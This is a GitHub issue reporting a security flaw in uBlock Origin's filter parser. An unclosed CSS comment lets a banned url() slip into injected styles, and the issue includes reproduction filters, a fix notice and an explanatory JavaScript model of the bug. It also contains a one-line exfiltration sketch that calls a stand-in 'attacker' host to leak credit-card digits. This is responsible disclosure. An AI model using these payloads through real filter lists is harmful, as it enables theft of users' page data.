
Security: comments can be used to smuggle url() functions into css values. #1693

Closed
8 tasks done
taviso opened this issue Aug 25, 2021 · 2 comments
Labels
fixed issue has been addressed

Comments


taviso commented Aug 25, 2021

Prerequisites

I tried to reproduce the issue when...

  • uBO is the only extension
  • uBO with default lists/settings
  • using a new, unmodified browser profile

Description

If I understand the filter security model correctly, third party filter lists are trusted to hide content, but are not permitted to modify or read page content. For this reason, the css url() function is not permitted in any :style() rules, because that could be used to modify and/or exfiltrate content.

I guess the obvious way to exfiltrate content would be to auto-generate a ton of input.creditcard:has-text(/^0/):style(background-image: url(http://attacker/?matched=0) filters, but I guess you already realized this and that's why you ban url() 😃

Anyway, I think I've found a way to get a url() past the parser: it doesn't check whether comments are closed in variables, so this filter:

example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://google.com);}/*"]

Generates this CSS:

div
{--foo: 1/*}

.div-gpt-ad
{width:1px!important;height:1px!important;min-height:1px!important;}

div[bar="*/;background-image: url(https://google.com);}/*"],
[href^="http://www.FriendlyDuck.com/"],

A specific URL where the issue occurs

https://www.example.com/

Steps to Reproduce

  1. Create the following filters in My filters:
example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://storage.googleapis.com/gd-wagtail-prod-assets/original_images/evolving_google_identity_3x2.jpg); background-size: cover;}/*"]
  2. Visit this link and observe that there is an image background. I think this should be impossible.

[Screenshot 2021-08-24 221513]

Expected behavior

The css url() function is correctly banned.

Actual behavior

The parser is confused by unclosed comments.

uBlock Origin version

1.37.2

Browser name and version

Chrome 92

Operating System and version

Fedora 34

uBlock-user added the "something to address" label Aug 25, 2021
gorhill added a commit to gorhill/uBlock that referenced this issue Aug 25, 2021
uBlock-user added the "fixed" (issue has been addressed) label and removed the "something to address" label Aug 25, 2021
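As an added illustration (this is example code, not taviso's and not uBlock Origin's own parser), the following JavaScript models the pipeline the report describes: a `:style()` value check that only looks for `url(`, the stylesheet assembled by concatenating rules in list order, and a comment-aware pass showing what the browser's tokenizer actually sees once the unclosed `/*` from the first rule meets the `*/` inside the later attribute selector. The function names, the filter object shape (`selector`, `style`, `isStyle`) and the `display:none!important` body used for the plain hide rule are assumptions of the example.

```javascript
// Added example, not uBlock Origin's code: models how an unclosed /* in a
// :style() value lets a url() from a later selector reach the page.
// Function names and the filter object shape are hypothetical.

// Naive check, as the report describes it: ban url() by substring only,
// without tracking whether a CSS comment is left open.
function naiveStyleValueOk(value) {
  return !/url\(/i.test(value);
}

// Remove CSS comments the way a browser tokenizer does: a '/*' outside a
// string starts a comment that runs to the next '*/' or to end of input,
// and quotes inside a comment are ignored. Strings are copied verbatim so
// a '/*' inside a string is not treated as a comment.
function stripCssComments(css) {
  let out = '';
  let i = 0;
  const n = css.length;
  while (i < n) {
    const c = css[i];
    if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      if (end === -1) break; // unterminated comment swallows the rest
      i = end + 2;
    } else if (c === '"' || c === "'") {
      let j = i + 1;
      while (j < n && css[j] !== c) {
        if (css[j] === '\\') j++; // skip escaped character
        j++;
      }
      out += css.slice(i, Math.min(j + 1, n));
      i = j + 1;
    } else {
      out += c;
      i++;
    }
  }
  return out;
}

// Hardened check: a :style() value has no business opening or closing a
// comment, and url() is searched for after comment removal.
function hardenedStyleValueOk(value) {
  if (value.includes('/*') || value.includes('*/')) return false;
  return !/url\(/i.test(stripCssComments(value));
}

// Assemble "selector\n{declarations}" blocks in list order, as the
// report's generated CSS shows.
function buildStylesheet(filters) {
  return filters.map(f => `${f.selector}\n{${f.style}}\n`).join('\n');
}

// Validate :style() values with the given check and return the CSS that
// would be injected, or null if any filter is rejected. Plain hide rules
// are not checked for url(): an attribute selector string may legitimately
// contain one, which is exactly what the second filter relies on.
function loadList(filters, styleValueOk) {
  for (const f of filters) {
    if (f.isStyle && !styleValueOk(f.style)) return null;
  }
  return buildStylesheet(filters);
}

// What the browser actually applies: is url() present once comments are gone?
function effectiveCssHasUrl(css) {
  return /url\(/i.test(stripCssComments(css));
}

// Constructed filter list reproducing the report, with an ordinary rule in
// between as in the generated CSS (the display:none body for the hide rule
// is an assumption of this example).
const filters = [
  { selector: 'div', style: '--foo: 1/*', isStyle: true },
  { selector: '.div-gpt-ad',
    style: 'width:1px!important;height:1px!important;min-height:1px!important;',
    isStyle: true },
  { selector: 'div[bar="*/;background-image: url(https://google.com);}/*"]',
    style: 'display:none!important;', isStyle: false },
];

const naiveCss = loadList(filters, naiveStyleValueOk);
console.log(naiveCss !== null);                       // true: every value passed the naive check
console.log(effectiveCssHasUrl(naiveCss));            // true: url() reaches the page
console.log(stripCssComments(naiveCss));              // "div\n{--foo: 1;background-image: url(https://google.com);}"
console.log(loadList(filters, hardenedStyleValueOk)); // null: first filter rejected
```

The check on its own does not need a full CSS parser: rejecting `/*` and `*/` outside the value context closes this hole, and running the `url(` search over the comment-stripped text catches the variant where the comment is opened and closed within a single value.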
uBlockOrigin locked as off-topic and limited conversation to collaborators Sep 11, 2021